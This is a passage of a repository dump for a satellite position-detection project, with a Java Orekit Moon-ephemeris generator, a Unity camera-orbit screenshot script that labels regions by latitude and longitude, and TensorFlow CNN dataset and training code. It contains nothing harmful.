"detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Java", "length_bytes": 5454, "license_type": "no_license", "max_line_length": 145, "num_lines": 157, "path": "/training_data_generation/scripts/Java/DataGen.java", "repo_name": "gerkenma/Position-Detection", "src_encoding": "UTF-8", "text": "package datagen;\n\nimport java.io.File;\nimport java.io.FileNotFoundException;\nimport java.io.PrintWriter;\nimport java.time.LocalDateTime;\n\nimport org.hipparchus.geometry.euclidean.threed.Vector3D;\nimport org.orekit.bodies.*;\nimport org.orekit.data.DataProvidersManager;\nimport org.orekit.data.DirectoryCrawler;\nimport org.orekit.frames.FramesFactory;\nimport org.orekit.time.AbsoluteDate;\nimport org.orekit.time.TimeScalesFactory;\nimport org.orekit.utils.IERSConventions;\nimport org.orekit.frames.ITRFVersion;\n\n\npublic class DataGen {\n\n\tpublic static void main(String[] args) {\n\t\t\n\t\t//Code block to establish a path to an ephemeride data directory, as well as search through it to find the appropriate data\n\t\tFile orekitData = new File(\"/Users/rperl/eclipse-workspace/orekit-data\");\n\t\tDataProvidersManager manager = DataProvidersManager.getInstance();\n\t\tmanager.addProvider(new DirectoryCrawler(orekitData));\n\t\t\n\t\t\n\t\t//Main block of program - generates coordinates for a celestial body at a given time in a certain coordinate frame (ITRf currently) and outputs\n\t\t//them to a csv file\n\t\ttry(PrintWriter writer = new PrintWriter(new File(\"MoonData.csv\"))){\n\t\t\n\t\t\t//datetime variable - change this to change the start date/time for the generated csv file\n\t\t\tLocalDateTime datetime = LocalDateTime.of(2019, 1, 1, 0, 0, 0);\n\t\t\t\n\t\t\t//Orekit's version of date/time - will work off of the date time variable\n\t\t\tAbsoluteDate date = new AbsoluteDate(2019, 1, 1, 0, 0, 0.0, TimeScalesFactory.getUTC());\n\t\t\t\n\t\t\t\n\t\t\t//Instances of the CelestialBody class for the sun and moon\n\t\t\tCelestialBody sun 
= CelestialBodyFactory.getSun();\n\t\t\tCelestialBody moon = CelestialBodyFactory.getMoon();\n\t\t\t\n\t\t\t//Main method of the program - takes the date variable, as well as a coordinate frame, and outputs position and velocity vectors, and\n\t\t\t//only the position vector is saved to the vector variable\n\t\t\t//To get coordinates for the moon instead, simply replace \"sun\" in the below line with \"moon\"\n\t\t\tVector3D vector = moon.getPVCoordinates(date, FramesFactory.getITRF(ITRFVersion.ITRF_2014, IERSConventions.IERS_2010, true)).getPosition();\n\t\t\t\n\t\t\t//Gets the x, y, and z coordinates of the position vector and formats them in terms of scientific notation\n\t\t\tString xvector = Double.toString(vector.getX());\n\t\t\txvector = xvector.replace('E', 'e');\n\t\t\t\n\t\t\tString yvector = Double.toString(vector.getY());\n\t\t\tyvector = yvector.replace('E', 'e');\n\t\t\t\n\t\t\tString zvector = Double.toString(vector.getZ());\n\t\t\tzvector = zvector.replace('E', 'e');\n\t\t\t\n\t\t\tint row = 1;\n\t\t\t\n\t\t\t//Writes the date, time, and position vectors to a StringBuilder and then the string in the StringBuilder is written into the csv file\n\t\t\t//Each line is of the form:\n\t\t\t//id,<row number>,<Year>,<Month Number>,<Day of Month>,<Hour>,<Minute>,<Second>,<X-coordinate>,<Y-coordinate>,<Z-coordinate>\n\t\t\tStringBuilder sb = new StringBuilder();\n\t\t\tsb.append(\"id,\");\n\t\t\tsb.append(Integer.toString(row));\n\t\t\tsb.append(\",\");\n\t\t\tsb.append(datetime.getYear());\n\t\t\tsb.append(\",\");\n\t\t\tsb.append(datetime.getMonthValue());\n\t\t\tsb.append(\",\");\n\t\t\tsb.append(datetime.getDayOfMonth());\n\t\t\tsb.append(\",\");\n\t\t\tsb.append(datetime.getHour());\n\t\t\tsb.append(\",\");\n\t\t\tsb.append(datetime.getMinute());\n\t\t\tsb.append(\",\");\n\t\t\tsb.append((double) 
datetime.getSecond());\n\t\t\tsb.append(\",\");\n\t\t\tsb.append(xvector);\n\t\t\tsb.append(\",\");\n\t\t\tsb.append(yvector);\n\t\t\tsb.append(\",\");\n\t\t\tsb.append(zvector);\n\t\t\tsb.append(\"\\n\");\n\t\t\t\n\t\t\t//System.out.println(sb.toString());\n\t\t\twriter.write(sb.toString());\n\t\t\t\n\t\t\tsb.setLength(0);\n\t\t\t\n\t\t\trow++;\n\t\t\t\n\t\t\t//Loops the entire block above for another 17,543 times. Total number of lines written to the csv file is 17,544 - the total number of\n\t\t\t//hours in 2019 and 2020. To get a longer or shorter csv file, simply change the \"17543\" below to the amount of desired hours\n\t\t\t//the program should take coordinates for\n\t\t\t//The program increments in hours, and that can be changed if so needed\n\t\t\tfor(int i = 0; i < 17543; i++) {\n\t\t\t\tdatetime = datetime.plusHours(1);\n\t\t\t\tdate = new AbsoluteDate(datetime.getYear(), \n\t\t\t\t\t\tdatetime.getMonthValue(), \n\t\t\t\t\t\tdatetime.getDayOfMonth(), \n\t\t\t\t\t\tdatetime.getHour(), \n\t\t\t\t\t\tdatetime.getMinute(), \n\t\t\t\t\t\t(double) datetime.getSecond(), \n\t\t\t\t\t\tTimeScalesFactory.getUTC());\n\t\t\t\t\n\t\t\t\tvector = moon.getPVCoordinates(date, FramesFactory.getITRF(ITRFVersion.ITRF_2014, IERSConventions.IERS_2010, true)).getPosition();\n\t\t\t\t\n\t\t\t\txvector = Double.toString(vector.getX());\n\t\t\t\txvector = xvector.replace('E', 'e');\n\t\t\t\t\n\t\t\t\tyvector = Double.toString(vector.getY());\n\t\t\t\tyvector = yvector.replace('E', 'e');\n\t\t\t\t\n\t\t\t\tzvector = Double.toString(vector.getZ());\n\t\t\t\tzvector = zvector.replace('E', 
'e');\n\t\t\t\t\n\t\t\t\tsb.append(\"id,\");\n\t\t\t\tsb.append(Integer.toString(row));\n\t\t\t\tsb.append(\",\");\n\t\t\t\tsb.append(datetime.getYear());\n\t\t\t\tsb.append(\",\");\n\t\t\t\tsb.append(datetime.getMonthValue());\n\t\t\t\tsb.append(\",\");\n\t\t\t\tsb.append(datetime.getDayOfMonth());\n\t\t\t\tsb.append(\",\");\n\t\t\t\tsb.append(datetime.getHour());\n\t\t\t\tsb.append(\",\");\n\t\t\t\tsb.append(datetime.getMinute());\n\t\t\t\tsb.append(\",\");\n\t\t\t\tsb.append((double) datetime.getSecond());\n\t\t\t\tsb.append(\",\");\n\t\t\t\tsb.append(xvector);\n\t\t\t\tsb.append(\",\");\n\t\t\t\tsb.append(yvector);\n\t\t\t\tsb.append(\",\");\n\t\t\t\tsb.append(zvector);\n\t\t\t\tsb.append(\"\\n\");\n\t\t\t\t\n\t\t\t\twriter.write(sb.toString());\n\t\t\t\t\n\t\t\t\tsb.setLength(0);\n\t\t\t\t\n\t\t\t\trow++;\n\t\t\t}\n\t\t\t\n\t\t\tSystem.out.println(\"Complete\");\n\t\t\t\n\t\t\t\n\t\t} catch(FileNotFoundException e) {\n\t\t\tSystem.out.println(e.getMessage());\n\t\t}\n\n\t}\n\n}\n" }, { "alpha_fraction": 0.42996522784233093, "alphanum_fraction": 0.48908424377441406, "avg_line_length": 40.57429885864258, "blob_id": "df50b1aeb6e48a7d328d33d9af3109d52fdda5d6", "content_id": "ac4f1fa736e99354280e5823f10348e93eae47d4", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "C#", "length_bytes": 10354, "license_type": "no_license", "max_line_length": 176, "num_lines": 249, "path": "/training_data_generation/scripts/Unity/SatelliteOrbit.cs", "repo_name": "gerkenma/Position-Detection", "src_encoding": "UTF-8", "text": "using System.Collections;\nusing System.Collections.Generic;\nusing System;\nusing System.Globalization;\nusing System.IO;\nusing UnityEngine;\n\npublic class SatelliteOrbit : MonoBehaviour {\n //This script governs the behavior of the camera in the Unity environment. 
It functions akin to a satellite orbiting the Earth in real life.\n\n //Width and height of the pictures to be taken\n public int resWidth = 256;\n public int resHeight = 256;\n\n //Latitude and longitude variables\n public float lon = 0;\n public float lat = 0;\n\n //String to display what major region (continent or ocean) the camera is above\n public string region = \"\";\n\n public bool land;\n\n public int counter;\n\n private ArrayList config = new ArrayList();\n private float spinspeed;\n private float orbitspeed;\n private bool takePictures;\n\n private bool takeHiResShot = false;\n\n public float x = 0;\n public float y = 0;\n public float z = 0;\n\n public DateTime date = new DateTime(2018, 1, 1);\n \n //Method to create names for taken screenshots and output them to the appropriate directories. Change the string.Format() method as needed to suit the needs of your machine\n public static string ScreenShotName(int width, int height, string region)\n {\n return string.Format(\"{0}/screenshots/{1}/screen_{2}x{3}_{4}.png\",\n Application.dataPath, region,\n width, height,\n System.DateTime.Now.ToString(\"yyyy-MM-dd_HH-mm-ss-fff\", CultureInfo.InvariantCulture));\n }\n\n // Use this for initialization\n void Start () {\n counter = 0;\n land = false;\n\n using (var reader = new StreamReader(\"SimConfig.txt\"))\n {\n string line;\n string[] values;\n\n while (!reader.EndOfStream)\n {\n line = reader.ReadLine();\n values = line.Split(' ');\n config.Add(values[2]);\n }\n }\n\n spinspeed = Convert.ToSingle(config[0]);\n orbitspeed = Convert.ToSingle(config[1]);\n\n if((string) config[2] == \"Yes\")\n {\n takePictures = true;\n }\n\n else\n {\n takePictures = false;\n }\n\t}\n\n // Update is called once per frame\n void Update()\n {\n //Method for the camera to spin while it is rotating around the Earth\n transform.Rotate(0, spinspeed * Time.deltaTime, 0, Space.World);\n\n //Method for the camera to rotate around the Earth\n //To change the orbit angle, change the 
second parameter to the desired Vector3\n transform.RotateAround(Vector3.zero, new Vector3(0, 0.56f, 0.44f), orbitspeed * Time.deltaTime);\n\n\n land = false;\n\n //Methods to find the longitude and latitude of the satellite\n lon = Vector3.SignedAngle(transform.position, Vector3.right, Vector3.up);\n lat = 90f - Vector3.Angle(transform.position, Vector3.up);\n\n x = transform.position.x;\n y = transform.position.y;\n z = transform.position.z;\n\n\n //This entire block is dedicated to checking if the latitude and longitude of the camera falls into certain coordinate ranges\n //If the camera falls into a certain coordinate range, then depending on the range, that shows what major region the camera\n //is above\n //All coordinate ranges are detailed in the Latitude Longitude Approximates Excel file\n\n //North America\n if (((lon >= -170.0f && lon < -145.0f) && (lat > 55.0f && lat <= 70.0f)) //Alaska\n || ((lon >= -145.0f && lon < -120.0f) && (lat > 55.0f && lat <= 70.0f)) //Alaska/Canada\n || ((lon >= -120.0f && lon < -65.0f) && (lat > 60.0f && lat <= 85.0f)) //Northern Canada\n || ((lon >= -65.0f && lon < 20.0f) && (lat > 60.0f && lat <= 85.0f)) //Greenland\n || ((lon >= -130.0f && lon < -60.0f) && (lat > 45.0f && lat <= 60.0f)) //Canada\n || ((lon >= -125.0f && lon < -70.0f) && (lat > 30.0f && lat <= 50.0f)) //USA\n || ((lon >= -110.0f && lon < -100.0f) && (lat > 10.0f && lat <= 30.0f)) // Mexico\n || ((lon >= -100.0f && lon < -85.0f) && (lat > 10.0f && lat <= 20.0f)) //Central America\n || ((lon >= -85.0f && lon < -70.0f) && (lat > 15.0f && lat <= 25.0f))) //Caribbean\n {\n land = true;\n region = \"North_America\";\n }\n\n //South Ameria\n else if (((lon >= -80.0f && lon < -30.0f) && (lat > 0.0f && lat <= 10.0f)) //Upper South America\n || ((lon >= -80.0f && lon < -35.0f) && (lat > -20.0f && lat <= 0.0f)) //Brazil\n || ((lon >= -70.0f && lon < -50.0f) && (lat > -40.0f && lat <= -20.0f)) //Argentina and part of Chile\n || ((lon >= -70.0f && lon < -63.0f) && (lat 
> -55.0f && lat <= -40.0f))) //Southern tip\n {\n land = true;\n region = \"South_America\";\n }\n\n //Europe\n else if (((lon >= 5.0f && lon < 40.0f) && (lat > 60.0f && lat <= 70.0f)) //Scandinavia\n || ((lon >= -10.0f && lon < 17.0f) && (lat > 35.0f && lat <= 60.0f)) //Western Europe\n || ((lon >= 7.0f && lon < 40.0f) && (lat > 35.0f && lat <= 60.0f)) //Eastern Europe\n || ((lon >= 40.0f && lon < 60.0f) && (lat > 40.0f && lat <= 70.0f))) //European part of Russia\n {\n land = true;\n region = \"Europe\";\n }\n\n //Asia\n else if (((lon >= 30.0f && lon < 75.0f) && (lat > 30.0f && lat <= 37.0f)) //Middle East\n || ((lon >= 35.0f && lon < 60.0f) && (lat > 10.0f && lat <= 30.0f)) //Arabian Peninsula\n || ((lon >= 60.0f && lon < 140.0f) && (lat > 40.0f && lat <= 75.0f)) //Siberia\n || ((lon >= 70.0f && lon < 120.0f) && (lat > 10.0f && lat <= 40.0f)) //Central/South/East Asia\n || ((lon >= 95.0f && lon < 155.0f) && (lat > -10.0f && lat <= 5.0f)) //Indonesia\n || ((lon >= 120.0f && lon < 135.0f) && (lat > 30.0f && lat <= 40.0f)) //Korea/Japan\n || ((lon >= 140.0f && lon < 180.0f) && (lat > 60.0f && lat <= 70.0f))) //\"Land Bridge\" between Russia and Alaska\n {\n land = true;\n region = \"Asia\";\n }\n\n //Africa\n else if (((lon >= -15.0f && lon < 35.0f) && (lat > 5.0f && lat <= 35.0f)) //Sahara\n || ((lon >= 35.0f && lon < 40.0f) && (lat > 0.0f && lat <= 5.0f)) //Eastern Africa\n || ((lon >= 40.0f && lon < 52.0f) && (lat > 0.0f && lat <= 10.0f)) //Somalia\n || ((lon >= 10.0f && lon < 40.0f) && (lat > -35.0f && lat <= 5.0f)) //Central/Southern Africa\n || ((lon >= 35.0f && lon < 30.0f) && (lat > -25.0f && lat <= -10.0f))) //Madagascar\n {\n land = true;\n region = \"Africa\";\n }\n\n //Australia/New Zealand\n else if (((lon >= 120.0f && lon < 145.0f) && (lat > -20.0f && lat <= -10.0f)) //North Australia\n || ((lon >= 115.0f && lon < 155.0f) && (lat > -30.0f && lat <= -20.0f)) //Central Australia\n || ((lon >= 140.0f && lon < 150.0f) && (lat > -40.0f && lat <= -30.0f)) 
//Southeast Australia\n ||((lon >= 165.0f && lon < 180.0f) && (lat > -45.0f && lat <= -35.0f))) //New Zealand\n {\n land = true;\n region = \"Australia__New_Zealand\";\n }\n\n //Antarctica\n else if (((lon >= -80.0f && lon < -60.0f) && (lat > -70.0f && lat <= -60.0f)) //Tip close to South America\n || ((lon >= -140.0f && lon < 170.0f) && (lat > -90.0f && lat <= -70.0f))) //The rest of Antarctica\n {\n land = true;\n region = \"Antarctica\";\n }\n else\n {\n land = false;\n }\n \n //Checks to see what ocean the camera is above if it is not above land.\n\n if (land == false)\n {\n //Pacific Ocean\n if (((lon >= -180.0f && lon < -100.0f) && (lat < 75.0f && lat >= 0.0f) && (land == false))\n || ((lon >= -180.0f && lon < -80.0f) && (lat < 0.0f && lat >= -90.0f) && (land == false))\n || ((lon >= 100.0f && lon < 180.0f) && (lat < 75.0f && lat >= -20.0f) && (land == false))\n || ((lon >= 145.0f && lon < 180.0f) && (lat < -20.0f && lat >= -90.0f) && (land == false)))\n {\n region = \"Pacific\";\n }\n\n //Atlantic Ocean\n else if (((lon >= -100.0f && lon < 20.0f) && (lat < 75.0f && lat >= 20.0f) && (land == false))\n || ((lon >= -80.0f && lon < 20.0f) && (lat < 20.0f && lat >= -90.0f) && (land == false)))\n {\n region = \"Atlantic\";\n }\n\n //Indian Ocean\n else if (((lon >= 20.0f && lon < 100.0f) && (lat < 75.0f && lat >= -20.0f) && (land == false))\n || ((lon >= 20.0f && lon < 145.0f) && (lat < -20.0f && lat >= -90.0f) && (land == false)))\n {\n region = \"Indian\";\n }\n\n //Arctic Ocean\n else if ((lon >= -180.0f && lon < 180.0f) && (lat >= 75.0f && lat <= 90.0f) && (land == false))\n {\n region = \"Arctic\";\n }\n\n }\n\n //Code block that controls the camera taking photos with every frame\n\n if (takePictures == true)\n {\n takeHiResShot = true;\n if (takeHiResShot)\n {\n RenderTexture rt = new RenderTexture(resWidth, resHeight, 24);\n Camera cam = gameObject.GetComponent<Camera>();\n cam.targetTexture = rt;\n Texture2D screenShot = new Texture2D(resWidth, resHeight, 
TextureFormat.RGB24, false);\n cam.Render();\n RenderTexture.active = rt;\n screenShot.ReadPixels(new Rect(0, 0, resWidth, resHeight), 0, 0);\n cam.targetTexture = null;\n RenderTexture.active = null; // JC: added to avoid errors\n Destroy(rt);\n byte[] bytes = screenShot.EncodeToPNG();\n string filename = ScreenShotName(resWidth, resHeight, region);\n System.IO.File.WriteAllBytes(filename, bytes);\n //Debug.Log(string.Format(\"Took screenshot to: {0}\", filename));\n takeHiResShot = false;\n }\n }\n \n }\n}\n" }, { "alpha_fraction": 0.6090282797813416, "alphanum_fraction": 0.6648814082145691, "avg_line_length": 35.30555725097656, "blob_id": "e2f4448825f39980e1f31d029fc892b68b2d7741", "content_id": "6804a353eff077d00269f6bc74da9df358043a38", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1307, "license_type": "no_license", "max_line_length": 73, "num_lines": 36, "path": "/cnn_files/sandbox.py", "repo_name": "gerkenma/Position-Detection", "src_encoding": "UTF-8", "text": "import tensorflow as tf\n\n# File only was used for experimentation, testing new implementations\n# File not necessary for any program execution\n \ndataset1 = tf.data.Dataset.from_tensor_slices(tf.random_uniform([4, 10]))\nprint(dataset1.output_types) # ==> \"tf.float32\"\nprint(dataset1.output_shapes) # ==> \"(10,)\"\n\ndataset2 = tf.data.Dataset.from_tensor_slices(\n (tf.random_uniform([4]),\n tf.random_uniform([4, 100], maxval=100, dtype=tf.int32)))\nprint(dataset2.output_types) # ==> \"(tf.float32, tf.int32)\"\nprint(dataset2.output_shapes) # ==> \"((), (100,))\"\n\ndataset3 = tf.data.Dataset.zip((dataset1, dataset2))\nprint(dataset3.output_types) # ==> (tf.float32, (tf.float32, tf.int32))\nprint(dataset3.output_shapes) # ==> \"(10, ((), (100,)))\"\n\ndataset = tf.data.Dataset.from_tensor_slices(\n {\"a\": tf.random_uniform([4]),\n \"b\": tf.random_uniform([4, 100], maxval=100, dtype=tf.int32)})\nprint(dataset.output_types) # ==> 
\"{'a': tf.float32, 'b': tf.int32}\"\nprint(dataset.output_shapes) # ==> \"{'a': (), 'b': (100,)}\"\n\ndataset1 = dataset1.map(lambda x: ...)\n\ndataset2 = dataset2.flat_map(lambda x, y: ...)\n\ndataset = tf.data.Dataset.range(100)\niterator = dataset.make_one_shot_iterator()\nnext_element = iterator.get_next()\n\nfor i in range(100):\n value = sess.run(next_element)\n assert i == value\n" }, { "alpha_fraction": 0.6327661275863647, "alphanum_fraction": 0.639493465423584, "avg_line_length": 45.366973876953125, "blob_id": "cfe4c19c496788b2db0e9badd7bddcc26500bdb7", "content_id": "032b6b1614b663a25c585fabedf05804e66a6121", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 5054, "license_type": "no_license", "max_line_length": 119, "num_lines": 109, "path": "/cnn_files/CreateDataset.py", "repo_name": "gerkenma/Position-Detection", "src_encoding": "UTF-8", "text": "from __future__ import absolute_import, division, print_function\nimport tensorflow as tf\nimport pathlib\nimport random\nimport sys\n\n\nclass CreateDataset:\n def __init__(self, data_root, mode=\"TRAIN\", batch_size=64, sequenced=False):\n self.data_root = data_root\n self.batch_size = batch_size\n self.mode = mode\n self.sequence=sequenced\n\n @staticmethod\n def preprocess_image(image):\n image = tf.image.decode_png(image, channels=3)\n image = tf.image.resize_images(image, [112, 112], method=tf.image.ResizeMethod.BICUBIC)\n image /= 255.0\n\n return image\n\n def load_and_preprocess_image(self, path):\n return self.preprocess_image(tf.read_file(path))\n\n def process_dataset(self, dataset, size, repeat_count=1):\n if self.mode == \"TRAIN\":\n # If dataset too large, use smaller shuffle buffer size\n # Shuffle buffer size equal to size of dataset guarantees uniform shuffle\n # if not self.sequence: dataset = dataset.shuffle(buffer_size=size)\n if not self.sequence: dataset = dataset.shuffle(buffer_size=1000)\n dataset = dataset.repeat(repeat_count)\n 
dataset = dataset.batch(self.batch_size)\n return dataset\n\n def create_dataset(self):\n data_root = pathlib.Path(self.data_root)\n all_image_paths = list(data_root.glob('*/*'))\n all_image_paths = [str(path) for path in all_image_paths]\n if self.mode == \"TRAIN\" and not self.sequence: # Shuffle data only if training and not in a sequence\n random.shuffle(all_image_paths)\n\n example_count = len(all_image_paths)\n\n label_names = sorted(item.name for item in data_root.glob('*/') if item.is_dir())\n label_to_index = dict((name, index) for index,name in enumerate(label_names))\n all_image_labels = [label_to_index[pathlib.Path(path).parent.name] for path in all_image_paths]\n\n # To prevent overfitting, need to finish implementation of creating validation dataset\n # TODO: Find how to save dataset to use for latter prediction when selecting best trial\n \"\"\"\n Training: 80% # Will be 70%\n Validation: 20% # Not yet implemented\n Testing: 20% # Will be 10%\n \"\"\"\n if self.mode == \"TRAIN\":\n training_start = 0\n training_end = int(example_count * 0.8)\n # validation_start = training_end\n # validation_end = int(example_count * 0.9)\n testing_start = training_end\n testing_end = example_count\n\n # Creates dataset of image paths\n train_path_ds = tf.data.Dataset.from_tensor_slices(all_image_paths[training_start:training_end])\n # validate_path_ds = tf.data.Dataset.from_tensor_slices(all_image_labels[validation_start:validation_end])\n test_path_ds = tf.data.Dataset.from_tensor_slices(all_image_paths[testing_start:testing_end])\n\n # Maps each dataset value to the load_and_preprocess_image function\n # Believe this is the cause of being unable to pickle the dataset\n train_image_ds = train_path_ds.map(self.load_and_preprocess_image)\n # validate_image_ds = validate_path_ds.map(self.load_and_preprocess_image)\n test_image_ds = test_path_ds.map(self.load_and_preprocess_image)\n\n # Create datasets of corresponding labels for images\n train_label_ds = 
tf.data.Dataset.from_tensor_slices(all_image_labels[training_start:training_end])\n # validate_label_ds = tf.data.Dataset.from_tensor_slices(all_image_labels[validation_start:validation_end])\n test_label_ds = tf.data.Dataset.from_tensor_slices(all_image_labels[testing_start:testing_end])\n\n # Creates full datasets of image-label pairs\n train_ds = self.process_dataset(tf.data.Dataset.zip((train_image_ds, train_label_ds)), example_count)\n # validate_ds = self.process_dataset(tf.data.Dataset.zip((validate_image_ds, validate_label_ds)),\n # example_count)\n test_ds = self.process_dataset(tf.data.Dataset.zip((test_image_ds, test_label_ds)), example_count)\n\n return train_ds, test_ds\n\n elif self.mode == \"PREDICT\":\n # Creates dataset of image paths\n predict_path_ds = tf.data.Dataset.from_tensor_slices(all_image_paths)\n\n # Maps each dataset value to the load_and_preprocess_image function\n # Believe this is the cause of being unable to pickle the dataset\n predict_ds = predict_path_ds.map(self.load_and_preprocess_image)\n\n return predict_ds\n\n else:\n sys.stderr.write(\"ERR:invalid mode passed to CreateDataset\")\n exit(-1)\n\n\nif __name__ == \"__main__\":\n tf.enable_eager_execution()\n test = CreateDataset(\"/share/projects/attitude/els_data/\")\n trn_ds, tst_ds = test.create_dataset()\n iterator = trn_ds.make_one_shot_iterator()\n tensor = iterator.get_next()\n print(tensor)\n" }, { "alpha_fraction": 0.5874145030975342, "alphanum_fraction": 0.6041039824485779, "avg_line_length": 35.73366928100586, "blob_id": "fc8387f89f8a023b721223f12ef6cfabd848639c", "content_id": "b6a9f645b7a5d806141381fa8120c6516195740d", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 7310, "license_type": "no_license", "max_line_length": 120, "num_lines": 199, "path": "/cnn_files/cnn_classifier.py", "repo_name": "gerkenma/Position-Detection", "src_encoding": "UTF-8", "text": "from __future__ import absolute_import, division, 
print_function\n\nimport tensorflow as tf\nfrom CreateDataset import CreateDataset\nimport sys\nimport numpy\nimport random\nimport os\nimport time\n\nBATCH_SIZE = 64\nMODE = \"TRAIN\"\nOUTPUT_NODES = 11\nDATA_PATH = \"/share/projects/attitude_data/mb/mb_data\"\nTRIALS = 1\ntf.logging.set_verbosity(tf.logging.INFO)\n\n\"\"\"List of all tunable hyperparameters\"\"\"\nall_params = {\n # Convolutional Layer #1 Params\n \"conv1_filters\": range(32, 128, 4),\n \"conv1_kernel\": [2, 3, 4, 5, 6],\n \"activation\": [tf.nn.leaky_relu, tf.nn.relu],\n \"kernel_initializer\": [tf.initializers.ones, tf.initializers.random_uniform, tf.initializers.zeros],\n\n # Convolutional Layer #2 Params\n \"conv2_filters\": range(32, 128, 4),\n \"conv2_kernel\": [2, 3, 4, 5, 6],\n\n # Final params\n \"dropout\": numpy.arange(0.2, 0.8, 0.1),\n \"units\": [128, 256, 512, 1024, 2048],\n \"learning_rate\": numpy.arange(0.001, 0.023, 0.003)\n}\n\n\"\"\"Parameters to be used in each trial of testing\"\"\"\nselected_params = {}\n\n\ndef cnn_model_fn(features, labels, mode):\n sess = tf.Session()\n sess.run(tf.global_variables_initializer())\n \"\"\"Model function for CNN\"\"\"\n input_layer = tf.reshape(features, [-1, 112, 112, 3])\n\n # Convolutional Layer #1\n conv1 = tf.layers.conv2d(\n inputs=input_layer,\n filters=selected_params[\"conv1_filters\"],\n kernel_size=selected_params[\"conv1_kernel\"],\n padding=\"same\",\n activation=selected_params[\"activation\"]\n )\n\n # Pooling Layer #1\n pool1 = tf.layers.max_pooling2d(inputs=conv1, pool_size=[2, 2], strides=2)\n\n # Convolutional Layer #1\n conv2 = tf.layers.conv2d(\n inputs=pool1,\n # Unable to change filter size of 2nd convolutional layer because changes output size\n # Caused mismatch with provided labels for evaluation\n # filters=selected_params[\"conv2_filters\"],\n filters=64,\n kernel_size=selected_params[\"conv2_kernel\"],\n padding=\"same\",\n activation=selected_params[\"activation\"]\n )\n\n # Pooling Layer #2\n pool2 = 
tf.layers.max_pooling2d(inputs=conv2, pool_size=[2, 2], strides=2)\n\n # Dense Layer\n pool2_flat = tf.reshape(pool2, [-1, int(int(input_layer.shape[1])/4)**2 * BATCH_SIZE])\n dense = tf.layers.dense(inputs=pool2_flat, units=selected_params[\"units\"], activation=selected_params[\"activation\"])\n dropout = tf.layers.dropout(inputs=dense, rate=selected_params[\"dropout\"], training=(mode ==\n tf.estimator.ModeKeys.TRAIN))\n\n # Logits Layer\n logits = tf.layers.dense(inputs=dropout, units=OUTPUT_NODES)\n\n predictions = {\n # Generate predictions (for PREDICT and EVAL mode)\n \"classes\": tf.argmax(input=logits, axis=1),\n # Add 'softmax_tensor' to the graph. It is used for PREDICT and by the 'logging_hook'.\n \"probabilities\": tf.nn.softmax(logits, name=\"softmax_tensor\")\n }\n\n if mode == tf.estimator.ModeKeys.PREDICT:\n return tf.estimator.EstimatorSpec(mode=mode, predictions=predictions)\n\n # Calculate Loss (for both TRAIN and EVAL modes)\n loss = tf.losses.sparse_softmax_cross_entropy(labels=labels, logits=logits)\n\n # Configure the Training Op (for TRAIN mode)\n if mode == tf.estimator.ModeKeys.TRAIN:\n optimizer = tf.train.GradientDescentOptimizer(learning_rate=selected_params[\"learning_rate\"])\n train_op = optimizer.minimize(\n loss=loss,\n global_step=tf.train.get_global_step()\n )\n return tf.estimator.EstimatorSpec(mode=mode, loss=loss, train_op=train_op)\n\n # Add evaluation metrics (for EVAL mode)\n eval_metric_ops = {\n \"accuracy\": tf.metrics.accuracy(\n labels=labels, predictions=predictions[\"classes\"])\n }\n return tf.estimator.EstimatorSpec(\n mode=mode, loss=loss, eval_metric_ops=eval_metric_ops\n )\n\n\ndef main(unused_argv):\n dataset_creator = CreateDataset(DATA_PATH, MODE)\n os.system('rm -rf /share/projects/attitude/cnn_files/tmp/space_classifier_model_*')\n\n # Set up logging for predictions\n tensors_to_log = {\"probabilities\": \"softmax_tensor\"}\n logging_hook = tf.train.LoggingTensorHook(tensors=tensors_to_log, 
every_n_iter=50)\n\n if MODE == \"TRAIN\":\n # Load training and eval data\n train_ds, eval_ds = dataset_creator.create_dataset()\n\n def train_input_fn(dataset):\n iterator = dataset.make_one_shot_iterator()\n features, labels = iterator.get_next()\n return features, labels\n\n def eval_input_fn(dataset):\n iterator = dataset.make_one_shot_iterator()\n features, labels = iterator.get_next()\n return features, labels\n\n with open('cnn_results.csv', 'w+') as file:\n for i in range(TRIALS):\n # Model data logged to ./tmp/space_classifier_model_{VARIABLE}\n # New directory placed\n classifier = tf.estimator.Estimator(\n model_fn=cnn_model_fn, model_dir=\"/share/projects/attitude/cnn_files/tmp/space_classifier_model_\"\n + '%03d' % i)\n start = time.time()\n for hp in all_params:\n selected_params[hp] = random.choice(all_params[hp])\n\n # Must delete Tensor Flow checkpoints in order to account for adapting CNN\n classifier.train(\n input_fn=lambda: train_input_fn(train_ds),\n # input_fn=train_input_fn,\n steps=None,\n hooks=[logging_hook])\n\n eval_results = classifier.evaluate(input_fn=lambda: eval_input_fn(eval_ds))\n print(eval_results)\n\n end = time.time()\n\n file.write('Trial %03d\\n' % i)\n for param in selected_params:\n file.write(\"%s, %s\\n\" % (param, selected_params[param]))\n file.write(\"--------\\n\")\n for result in eval_results:\n file.write(\"%s, %s\\n\" % (result, eval_results[result]))\n file.write(\"run_time, %s\\n\" % (end - start))\n file.write(\"\\n\")\n file.flush()\n\n elif MODE == \"TEST\":\n pass\n\n elif MODE == \"PREDICT\":\n # Load image(s) for prediction\n predict_ds = dataset_creator.create_dataset()\n\n def predict_input_fn(dataset):\n iterator = dataset.make_one_shot_iterator()\n features = iterator.get_next()\n return features\n\n # Select appropriate trial number to run prediction on that model\n trial_number = \"000\"\n classifier = tf.estimator.Estimator(\n model_fn=cnn_model_fn,\n 
model_dir=\"/share/projects/attitude/cnn_files/tmp/space_classifier_model_\" + trial_number)\n\n predict_results = classifier.predict(input_fn=lambda: predict_input_fn(predict_ds))\n results = next(predict_results, \"GO\")\n while results != \"GO\":\n print(results)\n results = next(predict_results, \"GO\")\n\n else:\n sys.stderr.write(\"ERR:Invalid mode passed to main function of cnn_classifier\")\n exit(-1)\n\n\nif __name__ == \"__main__\":\n tf.app.run()\n" } ]
9
c4e8ece0/pyml
https://github.com/c4e8ece0/pyml
88d443d9cf583ebdd506123de6426e68056bfe57
3147ee8721d7ca3294b04074c552ee2334d54ff1
8935c2ff55ea9e27a0ce3a0db0ce3fbac36b370c
refs/heads/master
2021-04-26T16:43:28.941068
2016-02-01T01:04:50
2016-02-01T01:04:50
50,798,732
0
0
null
null
null
null
null
